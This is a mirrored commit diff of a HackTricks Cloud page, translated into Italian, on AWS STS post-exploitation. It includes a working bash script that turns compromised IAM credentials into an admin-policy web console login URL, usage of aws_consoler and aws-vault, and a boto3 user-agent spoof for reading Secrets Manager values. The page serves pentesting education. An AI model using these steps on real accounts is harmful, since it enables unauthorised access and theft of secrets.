gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-10 04:05:09 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/README.md', 'src/banners/hacktricks-training.md', 'src/

Browse Source
This commit is contained in:
Translator
2024-12-31 20:18:58 +00:00
parent 820dd99aed
commit 931ae54e5f
245 changed files with 9984 additions and 12710 deletions
Download Patch File Download Diff File Expand all files Collapse all files

48
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
View File

@@ -4,21 +4,20 @@
## STS
For more information:
Per ulteriori informazioni:
{{#ref}}
../aws-services/aws-iam-enum.md
{{#endref}}
### From IAM Creds to Console
### Da IAM Creds a Console
If you have managed to obtain some IAM credentials you might be interested on **accessing the web console** using the following tools.\
Note that the the user/role must have the permission **`sts:GetFederationToken`**.
Se sei riuscito a ottenere alcune credenziali IAM, potresti essere interessato a **accedere alla console web** utilizzando i seguenti strumenti.\
Nota che l'utente/ruolo deve avere il permesso **`sts:GetFederationToken`**.
#### Custom script
The following script will use the default profile and a default AWS location (not gov and not cn) to give you a signed URL you can use to login inside the web console:
#### Script personalizzato
Il seguente script utilizzerà il profilo predefinito e una posizione AWS predefinita (non gov e non cn) per fornirti un URL firmato che puoi utilizzare per accedere alla console web:
```bash
# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
@@ -26,8 +25,8 @@ The following script will use the default profile and a default AWS location (no
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)
if [ $? -ne 0 ]; then
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
fi
# Parse the output
@@ -43,10 +42,10 @@ federation_endpoint="https://signin.aws.amazon.com/federation"
# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
)
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)
@@ -55,11 +54,9 @@ signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)
# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
```
#### aws_consoler
You can **generate a web console link** with [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler).
Puoi **generare un link alla console web** con [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler).
```bash
cd /tmp
python3 -m venv env
@@ -67,27 +64,23 @@ source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console
```
> [!WARNING]
> Ensure the IAM user has `sts:GetFederationToken` permission, or provide a role to assume.
> Assicurati che l'utente IAM abbia il permesso `sts:GetFederationToken`, o fornisci un ruolo da assumere.
#### aws-vault
[**aws-vault**](https://github.com/99designs/aws-vault) is a tool to securely store and access AWS credentials in a development environment.
[**aws-vault**](https://github.com/99designs/aws-vault) è uno strumento per memorizzare e accedere in modo sicuro alle credenziali AWS in un ambiente di sviluppo.
```bash
aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith
```
> [!NOTE]
> You can also use **aws-vault** to obtain an **browser console session**
> Puoi anche usare **aws-vault** per ottenere una **sessione della console del browser**
### **Bypass User-Agent restrictions from Python**
If there is a **restriction to perform certain actions based on the user agent** used (like restricting the use of python boto3 library based on the user agent) it's possible to use the previous technique to **connect to the web console via a browser**, or you could directly **modify the boto3 user-agent** by doing:
### **Evitare le restrizioni dell'User-Agent da Python**
Se c'è una **restrizione nell'eseguire determinate azioni basate sull'user agent** utilizzato (come la restrizione dell'uso della libreria python boto3 in base all'user agent), è possibile utilizzare la tecnica precedente per **connettersi alla console web tramite un browser**, oppure puoi direttamente **modificare l'user-agent di boto3** facendo:
```bash
# Shared by ex16x41
# Create a client
@@ -100,9 +93,4 @@ client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda
# Perform the action
response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString'])
```
{{#include ../../../banners/hacktricks-training.md}}